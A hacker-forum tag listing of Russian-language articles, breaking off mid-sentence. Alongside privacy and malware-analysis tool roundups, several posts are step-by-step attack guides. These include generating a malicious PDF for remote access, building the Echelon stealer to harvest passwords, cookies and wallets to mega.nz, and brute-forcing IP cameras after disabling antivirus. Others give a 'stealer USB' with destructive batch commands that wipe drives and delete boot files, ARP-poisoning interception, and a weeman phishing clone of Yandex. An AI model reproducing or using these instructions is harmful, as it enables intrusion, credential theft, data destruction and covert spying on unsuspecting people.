Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'программа'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать про очень полезный инструмент для установки утилит. DarkFly-Tool - является инструментом установки, для установки утилит. Так что вам не нужно вводить клон git или искать репозиторий github. Вы только должны выбрать номер, какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке. DarkFly-Tool - является инструментом установки, для установки утилит. Так что вам не нужно вводить клон git или искать репозиторий github. Вы только должны выбрать номер, какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке. Установка: pkg update pkg upgrade pkg install python2 pkg install git git clone https://github.com/Ranginang67/DarkFly- Tool cd DarkFly-Tool python2 install.py Использование: cd DarkFly Каждый кто использует большое количество различных утилит, однозначно должны использовать данный инструмент, так как это значительно уменьшает затраты времени. Также это просто очень удобно, поэтому пользуйтесь. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, что делать, если начнут блокировать интернет. Самый простой и доступный способ — использовать анонимную децентрализованную сеть. Сегодня все больше юзеров начинают интересоваться, что же это такое и как такая сеть может помочь избежать блокировки интернета в России. Одна из таких сетей – UTOPIA P2P. UTOPIA легко обходит блокировку и цензуру, обеспечивая свободное общение, поиск информации, передачу данных, проведение онлайн платежей без слежки и утечки данных: 1. Скачайте и установите UTOPIA – ссылка тут 2. Анонимно зарегистрируйтесь – без ввода личных данных и номера телефона 3. Используйте UTOPIA для общения, передачи данных и сёрфинга в интернете – в случае блокировок, сеть все равно будет функционировать 4. Пользуйтесь сами и рассказывайте друзьям – безопасная и доступная сеть подходит каждому Позаботьтесь о свободном и доступном интернет соединении сегодня, чтобы завтра было где читать новости и общаться с друзьями! Сайт проекта – https://u.is/ru Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! Совсем недавно компания DeepMind представила свой ИИ AplhaCode, который на международной платформе для соревнования кодеров смог попасть в 54% лучших участников. Нейросеть британской компании приняла участие в 10 тестах со средним уровнем сложности и смогла показать достойный результат, при этом, генерируя собственный уникальный код, не основанный на шаблонах. А теперь можно немного выдохнуть: главной сутью теста была демонстрация навыков критического мышления, кодирования, логики и алгоритмизации, а основная часть тестов состояла из задач по подбору выигрышной стратегии в настольных играх и прокладке дороги по заданным условиям. Можно сделать вывод, что писать полноценное ПО нейросеть пока не может, но неизвестно, что нас ждёт в будущем. Паниковать скорее всего не стоит: если ИИ научится писать код для более привычных нам сегодня задач, то в будущем кому-то придётся писать код для этого ИИ, а значит, без работы не останемся. Поэтому если вы собирались начать изучать программирование или вливаться в хакерские сообщества, то не стоит бросать это дело. Вы точно будете полезны. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры. Иногда пользователю по тем или иным причинам необходимо закрыть доступ в Интернет в Windows 10 для определенного ПО. Например, подобное решение нужно родителям, которые не против, чтобы дети проводили время в глобальной сети, но категорично настроены против того, чтобы они играли в онлайн-игры. Подобное действие можно осуществить как при помощи сторонних приложений, так и встроенными инструментами. Учитывая, что рядовым пользователям не хочется разбираться в сложных приложениях, где нужно множество действий для ограничения доступа в Инет, рассмотрим имеющуюся утилиту в Windows 10 — «Брандмауэр». Для осуществления поставленной задачи необходимо выполнить несколько шагов 1. Наберите в строке поиска «Панель управления», после чего кликните по одноименному пункту в результатах выдачи. 2. В новом окне, в графе «Просмотр», выберите из всплывающего меню «Крупные» или «Мелкие» значки. 3. Когда содержимое в окошке изменится, отыщите ссылку «Брандмауэр защитника Windows» и перейдите по ней. 4. Слева найдите и нажмите на «Дополнительные параметры». 5. В левом столбце выберите «Правила для исходящего подключения», а затем в правом «Создать правило». 6. В отображенном окошке оставьте значение по умолчанию «Для программы» и кликните «Далее». 7. Укажите путь к исполняемому файлу приложения, используя кнопку «Обзор…», либо просто его скопируйте и вставьте в соответствующую строчку. Примечание: если не можете отыскать место, где именно расположен данный файл программы, но на рабочем столе имеется его ярлык, кликните по нему ПКМ, после чего выберите «Свойства» и в отображенном окне, в графе «Объект», будет прописан его путь. 8. На следующем этапе, чтобы наверняка заблокировать доступ и не мучиться с выбором сетей, просто установите галочки на всех отображенных пунктах. 9. Далее остается лишь указать имя данного правила для его быстрого поиска (например, если их было создано множество, то отыскать одно из них, вбивая непонятные названия, весьма проблематично) и кликнуть по кнопке «Готово». После этого при запуске приложения будет отображаться сообщение, что соединение с сетью Интернет отсутствует. Если же от подобного правила необходимо избавиться, его таким же образом можно удалить. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! Держите подборку разного рода инструментов, при использовании которых ваша анонимность станет чуточку выше. Мессенеджеры: https://briarproject.org/ - Может работать как через интернет, так и без него (локальная сеть в одном WiFi и Bluetooth). Только Android. https://tox.chat/ - Мессенджер, работающий по P2P. Внимание: для каждого устройства нужен свой ключ. Один ключ на нескольких устройствах не работает. iOS не поддерживается. https://404.city/ -. Внезапно (нет). Федеративный (т.е. можно регистрироваться на любом сервере, а не одном). https://delta.chat/en/download - Использует обычный EMail под капотом, так что вы можете использовать свою почту. https://element.io/get-started - Тоже федеративный, протокол https://signal.org/ - Мессенеджер с открытым исходным кодом. VPN для мобильных устройств: https://protonvpn.com/ - Требует регистрацию. Бесплатно доступно около 15 серверов. https://nordvpn.com/ - Требует регистрацию. Есть триал на 30 дней. https://psiphon3.com/ - Не требует регистрацию. https://github.com/Nyr/openvpn-install Почта: https://cock.li https://protonmail.com - не требует номер телефона, это одна из опций подтверждения регистрации. Можно просто пройти капчу, например, или указать адрес другой почты. https://tutanota.com - вроде подтверждает аккаунты через некоторое время. Файлообменники: Пригодятся, если кому-то нужно что-то передать. https://anonfiles.com https://bayfiles.com Главное: Tor. https://torproject.org I2P. https://geti2p.net/ru/ Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры, в данной статье я решил поделиться списком, в который пошли самые эффективные сервисы-анонимайзеры! Некоторые из представленных вариантов платные, что однако не заставляет отказаться от их использования. Итак, приступим: 1. STZBlaster - ТЫК - данная прога позволит вам изменить имена, начиная от имени ПК, хоста, и заканчивая ID процессора. Также, позволяет изменить региональные настройки. Будьте осторожны при изменении MAC настроек, они могут негативно отразится на работе вашей системы. 2. RMOSChange - ТЫК - интересная програмка для смены HTTP-заголовков браузеров. Данная прога может пригодиться вам для смены языковых норм браузера, его местонахождения, а также для подмены user-agent, что позволит вам беспрепятственно заходить на сайты других стран и регионов. 3. SMAC 2.0 - ТЫК - сие чудо позволяет менять MAC адрес сетевой платы, раз в месяц. 4. Privacy Suite Main Menu - ТЫК - программа для сейва крипты в созданные контейнеры jpg, wav файлы, для усложнения их обнаружения. Еще прога позволят переносить крипту на флешку. Контейнер с шифром можно открыть уже без использования данной проги. 5. TrueCrypt - ТЫК - одна из лучших программ для шифрования важной информации. 6. Proxyfier - ТЫК - проксификатор с возможностью задать приложение, которое будет соксифицировано. 7. OpenVPN GUI - ТЫК - один из самых эффективных VPN сервисов. 8. VPSProxy - ТЫК - тоже отличный VPN, с постоянно меняющимися серверами, что позволяет вам наиболее эффективно скрывать себя в сети. 9. O&O SafeErase - ТЫК - программа, для безвозвратного удаления файлов с вашего ПК.
  7. Я уверен, что у каждого из вас есть как минимум один старый Аднроид-телефон. И если вы не знаете куда его деть, у меня для вас есть интересное предложение — сделать из него скрытый диктофон и скрытую камеру наблюдения с детектором движения и возможностью записи происходящего. Приложение, которое делает камеру видеонаблюдения из телефона называется Haven, и разница между ним и другими похожими заключается вот в чем: Рекомендовано самим гуру анонимности и приватности Эдвардом Сноуденом, проектом Guardian и Freedom of the Press Foundation.Не хранит записанную информацию на серверах принадлежащих непонятно кому.Имеет открытый код и доступен для скачивания, который я предполагаю скоро подвергнут аудиту.Установка Haven Перейдите на сайт Google Play, скачайте приложение и запустите.После запуска вас попросят установить пороговые значения для звука и движения, и вам нужно провести некоторое тестирование, чтобы уменьшить ложные срабатывания. При правильной настройке вы исключите постоянные шумы и движения, такие как звук работающего холодильника или появление вашего кота. Также приложение Haven предложит связать ваше устройство путем добавления номера на который будете получать уведомления. Вы не обязаны это делать, но в таком случае все будет сохраняться только локально в память устройства. Haven использует сквозное шифрование для защиты данных. Пользователи, которые хотят еще больше безопасности, могут использовать для этого сеть Tor. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Благодаря сегодняшней статье вы полностью оборудуете свой браузер от всех видов слежения. 1. Privacy Badger Инструмент бесплатный и с открытым исходным кодом. Он распознаёт 16 типов рекламных трекеров и обрезает им доступ к вашему браузеру. 2. Ublock Origin Также запрещает рекламные трекеры и ссылки для отслеживания. 3. User-Agent Switcher Меняет отпечаток браузера и тип устройства. Помимо улучшения приватности мы также можем изменить поведение веб-страницы, притворившись специфическим девайсом. Например, Инстаграм позволяет загружать фотографии только с мобильного устройства. Соответственно, чтобы загрузить изображения с компьютера, нужно изменить user-agent на один из используемых смартфонами. 4. Chaff Если вы хотите затруднить жизнь тому, кто отслеживает ваш сетевой трафик, или сделать собираемые данные менее полезными, попробуйте расширения наподобие «Chaff», которые предназначены для генерирования поддельного трафика. Согласно установленным правилам, Chaff будет посещать сайты в случайном порядке, начиная с указанных вами. Можно указать другие параметры с той целью, чтобы сделать трафик более или менее реалистичным. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Привет хакеры! Сегодня будем собирать свой стиллер из исходников Echelon Stealer v6. Функционал Браузеры: все браузеры на основе Chromium, все браузеры на основе Gecko (Mozilla) включая x32 и x64 версии, старые версии Edge и ie, рекурсивный сбор всех данных: пароли, история, авто-заполнение, cookies, cards, стилер криптокошельков - сессий и .dat файлов. Стиллер сессий: Discord, Telegram, Steam, FileZilla, Total Commander, Psi+, Pidgin и др. Граббер файлов: можно ограничить вес каждого файла, можно указать свои расширения для граббинга, по умолчанию собирает файлы с расширениями ".txt", ".doc", ".cs", ".json", ".suo", ".sql", рабочий стол и все подпапки, названия папок и их вложенность сохраняется как есть. Отправка лога осуществляется на: https://mega.nz Установка и настройка Устанавливаем Visual Studio, если еще не установлена. Качаем проект и открываем Echelon.sln, переходим к Program.cs. Настраиваем по скрину, не забывая ввести данные от mega.nz. Запускаем сборку обязательно на конфигурации Release! Для первого запуска проект нужно собрать как "Консольное приложение", чтобы убедиться в работоспособности. Если все нормально - собираем как "Приложение Windows". Собранный файл, уже скомпилированный, будет лежать в папке OUTPUT в корне проекта. Скачать Echelon Stealer v6. Внимание! Файл не проверен на вирусы! Осторожно! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Сначала разберёмся какие типы видов камер бывают: IP камеры - это камеры к которым можно подключиться через интернет. (Работают с интернетом Локальные камеры - это камеры к которым невозможно подключиться через интернет. Они никак не будут задействованы в интернет. (Работают без интернета) Теперь я вам покажу и расскажу как находить IP камеры. Для начала нам понадобиться необходимый софт для брута, чека и просмотра. Сперва нам нужно будет скачать архив. Там весь необходимый софт для работы. Если же вы не хотите скачивать мой архив со сборником программ, тогда в путь за поиском необходимых программ ! Скачиваем архив: СКАЧАТЬ KPortScan - https://www.virustotal.com/gui/file...434032842339f0ba38ad1ff62f72999c4e5/detection iVMS-4200 - https://www.virustotal.com/gui/file...379b736524606fc52e7fc27b978f13c749b/detection HIKKA - https://www.virustotal.com/gui/file...ecc27f76bd501d73b1265021069e653c1ba/detection Внимание! Перед распаковкой отключите антивирус и добавьте KPortScan в исключения. Так как именно на него антивирус ругается. Вирусов нету Распаковываем архив в любую папку. И нас встречают 3 программы. Что они делают эти три программы ? KPortScan - Брут IP камер HIKKA - Чек IP камер iVMS-4200 - Просмотр IP камер Что такое брут и чек? Брут (Brute) - Добыча чего-либо Чек (Check) - Проверка чего-либо (в данном случае проверка с помощью логина и паролей) Сперва нам нужно открыть сайт. Вот он: https://4it.me/getlistip Вписываем туда город, который хотим взломать на камеры! В моём случае например это будет российский город "Тверь" Копируем IP-диапазоны, и открываем KPortScan и вставляем туда скопированные IP-диапазоны. В списке выбираем "RUSSIAN FEDERATION" Далее в "Port" пишем значение "8000" И нажимаем кнопку "Start" Внимание! Перед тем как нажимать кнопку "Start", сверьтесь со скрином как у меня, чтобы у вас потом не возникло ошибок! Как сверили свои значения с моим скрином, чтобы они совпадали, смело нажимаем на кнопку старта! Ну и теперь осталось дождаться окончания чека. При чеке интернет у вас будет нагружен довольно сильно. Так что приготовьтесь к этому испытанию) После завершения и вас будет отображено количество найденных IP камер. Закрываем KPortScan и открываем файл results.txt Там будут найденные камеры. Копируем все найденные камеры из файла results.txt и открываем папку с программой под названием "HIKKA" Открываем файл "hosts" и скидываем скопированные камеры туда. Сохраняем и запускаем файл "start.bat" Теперь ждём когда будет зелёная строка, это будет означать что камера найдена! Пример найденной камеры: Как только HIKKA нашла камеру, идём устанавливать программу "iVMS-4200" Кстати, чуть не забыл, когда HIKKA нашла камеру, в папке pics будут фотки самой камеры, а в названии данные об камере. Как только установили программу "iVMS-4200", открываем. Если у вас английский язык, то нажимаем вверху "Help->Language->Русский Далее открываем вкладку "Управление устройством" и нажимаем на кнопку "Добавить" Вводим любой псевдоним. Вводим адрес (пример: 91.238.24.219) Вводим пользователя и пароль Если вы запутались, то сверьтесь как у меня на скрине: После ввода необходимых данных нажимаем на кнопку "Добавить" После успешного импорта камеры, переходим во вкладку "Основной ракурс" И видим что появилась новая папка с вашим псевдонимом камеры. Открываем папку, и нажимаем на камеру 2 раза левой кнопкой мыши, или же просто перетягиваем камеру чуть правее. Ну вот и всё! Что делать дальше вам решать.. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. В этой статье мы создадим Стиллер флешку и несколько опасных батников. BAT расширение одинаково успешно может работать на базе таких ОС как Windows, Mac и Linux(первая - ЗЛО). На базе ОС Mac, BAT формат будет доступен с применением все тех же стандартных текстовых редакторов или Parallels Desktop 7 for Mac. Для того, чтобы открыть расширение в ОС Linux нужно использовать gedit. Как работает Стиллер флешка? Мы создаём файл .inf во флешке, который будет автоматически открывать рядом с ним батник,в котором будет код для открытия терминала и выполнения действий на ОС автоматически. Это всё будет происходить мгновенно при подключении к компу. Т.е. вам нужно всего лишь 2 секунды доступа к компу. Сначала создадим флешку, а после уже будем добавлять код в батник. 1)Создайте текстовой документ (на английском языке) 2)Запишите туда следующее: [AutoRun] Open=”(название батника)” P.S. В windows 10 и 8 ауторан не сработает. Поэтому вам придётся вручную запустить батник 3)Измените его формат на .inf 4)Затем рядом создайте новый документ, и перед тем как изменить его формат на .bat мы будем внедрять туда разного вида код для разных целей. Виды кода: 1) Форматируем диски C, D, E rd/s/q D: rd/s/q C: rd/s/q E: 2) Удаление всех файлов del *.* 3) Эффект Матрицы | Matrix Effect @echo off color 02 :tricks echo %random%%random%%random%%random%%random%%random%%random%%random% goto tricks Это не опасно для вашего ПК 4) Выключение ПК и отключение возможности перезагрузки @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c: tldr del c: tdlr attrib -r -s -h c:windowswin.ini del c:windowswn.ini @echo off Msg *YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c:Drive Сохраняем как kind.bat и выходим орать на улицу 5) Заменяем файлы на нерабочие Данный вирус заменит следующие форматы(.exe .jpeg .png .mpeg .sys) @echo off assoc .txt=jpegfile 6) Останавливаем доступ в интернет. Не использовать на себе! Off Ipconfig /release Чтобы вернуть доступ в интернет обратно, в CMD пишем IPconfig /renew 7) Открываем бесконечное количество калькуляторов off CLS :A start calc.exe goto A Статья несет сугубо ознакомительный характер и не призывает к действия. Автор не несет ответственности за использование данной инфомации.
  13. Зайти в Windows можно при помощи паролей или же благодаря смарт-картам. Администратор проводит настройку таким образом, чтобы компьютер делал запрос на определенную смарт-карту, которая дает доступ к Операционной системе. Метод двухфакторной аутентификации заключается в том, что человек должен знать не только какой-либо код доступа, но и обладать вещью для разблокировки, в данном случае – смарт-карта. Только при необходимом сертификате смарт-карта даст возможность ввода пин-кода, после чего пользователь может запустить операционку. Во время настройки пользователя, на домен устанавливается атрибут, который необходим для работы аутентификации с помощью смарт-карты, к данному пользователю приписывается какой-то NT-хэш. Значения данного хэша устанавливается случайно и в будущем никак не изменяются. Контроллер домена во время проведения аутентификации пересылает данный хэш в узел, подключение к которому производится. Атака Pass the hash Уязвимость работает по данному принципу: мошенник получает тот самый NT-хэш и благодаря нему проводит аутентификацию, используя способ pass the hash. Узнав данную информацию, злоумышленнику не нужно будет иметь смарт-карту или пин-код для получения доступа. А т.к. хэш в будущем неизменен, то злоумышленник получается возможность подключаться к ресурсам в любой момент времени. Для получения хэша используется инструмент Mimikatz прямо на сетевых узлах, со сценариями от 1 до 3. Помимо хэша и соответственно пароля учетной записи, можно узнать реальный пин-код смарт-карты. Запуская на сетевых узлах инструмент Mimikatz, появляется возможность копирования всех данных с привилегированных учетных записей, даже в случае использования двухфакторной аутентификации. Авторизация в данной операционной система построена так, что не получив прямого доступа к пользователю администратора, он получит хэш. А если он неизменен, то позволяет использовать его на прочих узлах сети. Данный методы дают возможность использования атаки и обхода данного метода защиты. Защита от уязвимости Windows 10 имеет в своем арсенале Remote Credential Guard, необходимая для защиты пользователей, во время удаленной работы. Данная вещь повышает безопасность, при попытке использования атаки.
  14. Привет, хакеры, в статье расскажу о программе написанной на языке Python, которая помогает расширить существующий набор инструментов мониторинга безопасности рабочих станций или серверов, а также для автоматизирования быстрого сканирования вирусов. Режимы Распознавание последней точкиСканирование вирусовЖурналы событийSysmonWatchdogTShark Принцип работы: 1. Уведомление приходит из одного источников перечисленных выше. 2. Уведомление проходит проверку на валидность в config / ecxeptions / exception.json, где находятся все уведомления, на которые не нужно обращаться внимания. Если необходимо распознать последнюю точку, то необходимые уведомления игнорируется при помощи ПО. Чтобы сканировать вирусы нужно вручную добавить исключения в систему. 3. Если уведомление есть в exception.json, то возвращаемся к первому пункту, если нет, то идем дальше. 4. Если включен режим обучения, то появляется окно с предупреждением, где у вас спрашивают, собираетесь ли вы игнорировать уведомление, если да, то прописываем все данные для этого. 5. Если хотите пропустить выбор исключений, то переходим к следующему шагу. 6. Уведомление юзера о времени захвата. Делаем вывод: Уведомление в виде всплывающего окно появляется только, если работает мышь и компьютер ничем не блокируется. Все предупреждения сохраняются в виде текстового файла с расширением .txt Скачать данную программу и подробнее ознакомится с ней, можно по ссылке - https://github.com/yarox24/attack_monitor#supported-os
  15. Ettercap – программа предназначенная для сканирования сетевого трафика, который проходит через ПК, имея специальные опции. Приложение способно проводить атаки “man in the middle”, которое вынуждает другое устройство отсылать пакеты не роутеру, а прямо вам. Wireshark – популярная утилита, позволяющая перехватывать и сканировать трафик, является стандартной программой для образования и troubleshooting. Она поддерживает огромное множество протоколов, что делает ее универсальным инструментом, прибавляя к этому удобный интерфейс и сильнейшие фильтры Атака “Man In The Middle” – одна из атак криптографии, при которой взломщик крадет и изменяем сообщения, используемые для обмена информацией между корреспондентами, примечательно тем, что никто не догадывается об изменениях. Итак, первым делом необходимо установить подключение с сетью. Далее включаем первую программу, она имеет собственный интерфейс. Необходимо узнать, какие ип-адреса подключены к данной сети. Переходим в Sniff и там выбираем unified sniffing В данном разделе необходимо определиться с типом сети, которая будет отслежена. Нам необходима беспроводная сеть. Готово, теперь доступен специальный функционал. Необходимо выбрать Host, далее Scan for hosts. Когда сканирование будет завершено, переходим в список всех хостов, найденных на данном этапе. Что их увидеть переходим в Hosts – Hosts list Здесь выбираем: 1. Ип-адреса, необходимые для отслеживания 2. Устанавливаем слежу на них, нажатием Add to Target 1 и Add to Target 2 Далее входим в Mitm – ARP poisoning, где включаем опцию sniff remote connections, и конечно же начинаем отслеживание, нажав на кнопку Start Теперь запускаем вторую программу списка – Wireshark Данный способ атаки, совершаемый именно этими инструментами, можно совершать только на сайты, находящиеся на незащищенном протоколе – http. С протоколом https не выйдет. Не забывайте, что подключаясь к общественной сети, тоже можете подвергнутся хакерской атаке. Методы защиты: 1. Не допускайте возможности подключения к вашей сети неизвестных 2. Во время использования общественных сетей, не забывайте об возможно кражи ваших паролей. 3. Пользуйтесь VPN, подобные технологии помогут обезопасить вас от множества видов атак 4. Лучший способ защиты – сертификат SSL Надеюсь информация полезна и поможет вам избежать подобных атак или успешно провести их. К действиям не призываю!
  16. Привет, хочу рассказать в данной статье как андроид устройство легко превращается в мощный инструмент для фишинга. Фишинг – подмена данных, для заполучения личной информации пользователя. Для этого понадобится программа – kali linux-weeman. Сейчас вы подумали, что за хрень, ведь я говорил об андройде. Все верно, первым делом устанавливаем пожалуй лучшую консоль для андроида – termux. Он является одним из лучших эмуляторов линукса. После скачивания открываем его. Для повышения комфорта работы устанавливаем Hacker’s Keyboard. Для подготовки к установке прописываем в termux несколько команд: $ apt update $ apt install Необходимо стабильное интернет-подключение, от этого будет зависеть скорость выполнения операции, после этого прописываем: $ apt install git Как мы видим у нас появляется вопрос, хотите ли вы продолжить? Для согласия пишем букву – y. Переходим к следующей команде: $ apt install python2 Появляется абсолютно такой же вопрос, на него тоже нужно дать согласие. Данная команда устанавливает язык программирования – python, именно он позволяет работать программе weeman. Подготвка к установке завершена, устанавливаем weeman: $ git clone https://github.com/evait-security/weeman Далее прописываем: $ ls Видим содержимое каталогов: После ввода команды не появилось никаких надписей? Вам стоит заново пройтись по предыдущим пунктам, если все работает, переходим дальше: $ cd weeman $ ls Образовались данные файлы, стартуем weeman $ python2 weeman.py Успешная установка, переходим к следующим пунктам. Необходимо вывести консоль, делается при помощи данного кода: $ help Далее устанавливаются определенные настройки, делаю на примере Yandex Вводим несколько строк: $ set url https://yandex.ru $ set port 8080 $ set action_url https://yandex.ru Первая команда необходима для установки адреса сайта, который будет скопирован. Вторая команда нужна для установки порта. Третья строка выбирает адрес, на который будет произведена переадресовка жертвы. Для проверки настроек прописываем этот код: $ show Далее запускаем: $ run Как мы видим все работает, адрес сервера. Копируем данный адрес и прописываем в браузере. Предупреждаю, что вся информация предоставлена лишь для ознакомления, не призываю к действиям. За выполнение подобных схем вы можете понести реальное уголовное наказание, поэтому выполняйте подобные действия лишь на свой страх и риск.
  17. Приветсвую, в данной статье немного расскажу о приложении, разработанным специально для аналитиков вредоносного кода. Программа является инструментов по автоматизации данного процесса, она позволяет быстро собирать, сравнивать и составлять отчеты о действиях, выполнявшие бинарный файл, работая в системе. Собственно данной программой является – SysAnalyzer Компоненты данного приложения работают на основе сравнений частей системы за определенный промежуток времени. Для этого используется механизм снапшотов, он оказывается куда эффективнее журналирования, т.к. занимает намного меньше объема памяти для извлечения информации. Во время мгновенных снимков легко распознаются различные изменения системы, после включения определенных программ и утилит. Целевые исполняемые файлы запускается в том же режиме что и система. Во время сканирования вредоносной программы, вы должны знать, что будет происходить тестовое заражение системы. Программа создает снимки несколько системных атрибутов: Запуск процессовПортыЗагрузка dllЗагрузка системный драйверовСнимок необходимых ключей реестраПрограмма станет незаменимым инструментом при сканировании различного вредоносного кода.
  18. Приветствую, рассмотрим программы и различные инструменты которые помогут вам в реверсе. Detect It Easy Данная утилита поможет определить упаковщик, имя при себя большой запас опций и функционала. К примеру, она может увидеть этропию секций файлов, это даст возможность узнать есть ли шифрование. ExeInfoPE Очередной распознаватель упаковщиков. Его интерфейс немного неудобный, может не понравится. Но плюсы есть, например постоянная поддержка программы, большое количество полезных функций и подсказки во время распаковки. На самом деле, я бы хотел порекомендовать новичкам данную утилиту. Имеется несколько автоматических распаковщиков, есть большое кол-во подсказок, по снятию защиты. А также имеются все обыденные возможности, просмотра заголовков файлов, секции, hex просмотрщик и несколько других встроенных программ. Поддерживаются плагины. HxD Бывают ситуации когда необходимо обратиться к нашему винчестеру в режиме бинара. Для этого созданы 16-ричные редакторы, данная программа является примером. Постоянная поддержка, бесплатное использование, поддержка многих форматов, отлично выполняет свою работу и имеет неплохой интерфейс. Имеются и некоторые особенности, например полное удаление информации. Также если хотите носите на флешке эту программу, то сделать это возможно с помощью портативной версии. HIEW Шестнадцатеричный редактор, который имеет за своей спиной огромную историю, но это не мешает ему обновляться дальше. Есть как платная, так и бесплатная версия. Интерфейс выглядит весьма старинно, но привыкнуть к нему можно быстро. Также есть функция работы только с клавиатуры. Pestudio Программа, позволяющая анализировать различные малвари. Программа сама отправляет файл на сканирование через вирус тотал, показывает таблица импорта, какие-то следы от вирусов, данные о заголовках. Коротко говоря, антивирусная машина, которая позволяет сканировать множество файлов и получать развернутую информацию о них. Fakenet-NG Эмулятор работы сети, это полное предназначение программы. Во время сканирования образцов малвари зачастую необходимо прогонять через все сетевые обращение, DNS HTTP, заниматься сниффингом, узнать ип-адреса серверов. Данная программа поддерживается и по сей день, работает на многих операционных системах. RegShot Утилита, следящая за изменениями в реестре. Запоминает все изменения, показывает где они произошли. TCPView Небольшой инструмент для контроля над сетевой активностью приложений. Список открытых портов, протоколы, различные счетчики пакетов. Безусловно важнейший инструмент взломщика. Resource Hacker Известная программа позволяющая изменить различные ресурсы. С помощью нее можно редактировать: манифест текстовые диалоговые строки, информацию курсора и т.д. Это не самые частые действия, но все же такая программа в арсенале очень пригодится.
  19. Привет хакерам, в данной статье расскажу, как правильно установить и провести настройку Tor’а. Первым пунктом задачи будет настройка расширения NoScript, данные настройки необходимы, если вы собираетесь пользоваться даркнетом, чтобы получить максимальную конфиденциальность от различных структур и взломщиков. Если вам тор нужен для обхода блокировок, то можете пропускать данный пункт и использовать стандартные настройки. Настройка NoScript Создатели браузера Тора добавили в свое творение важнейший плагин NoScript, установлен он изначально, но при скачивании браузера он не настроен. Чтобы провести настройку нажимаем в левом верхнем углу на иконку, далее “Настройка” Перейдя в “Белый список” снимание выделение со строки “Глобальное разрешение скриптов” Настройка скрытых параметров браузера Переходим непосредственно к настройке самого браузера, нам нужно зайти в скрытные настройки. Для этого необходимо в адресной строке прописать “about:config” и переходим на страницу. После под предупреждением нажимаем синюю кнопочку и переходим к следующему пункту. Первым делом нужно изменить загрузку и обработку js. Делается это при помощи изменения строки “javascript.enabled” В появившейся странице появилась строка поиска, там и вводим данным параметр и начинаем поиск. Потом на параметре нажимаем ПКМ и тыкаем на переключить, необходимо сменить true на false Далее ищем параметр “network.http.sendRefererHeader”, меняя его значения с 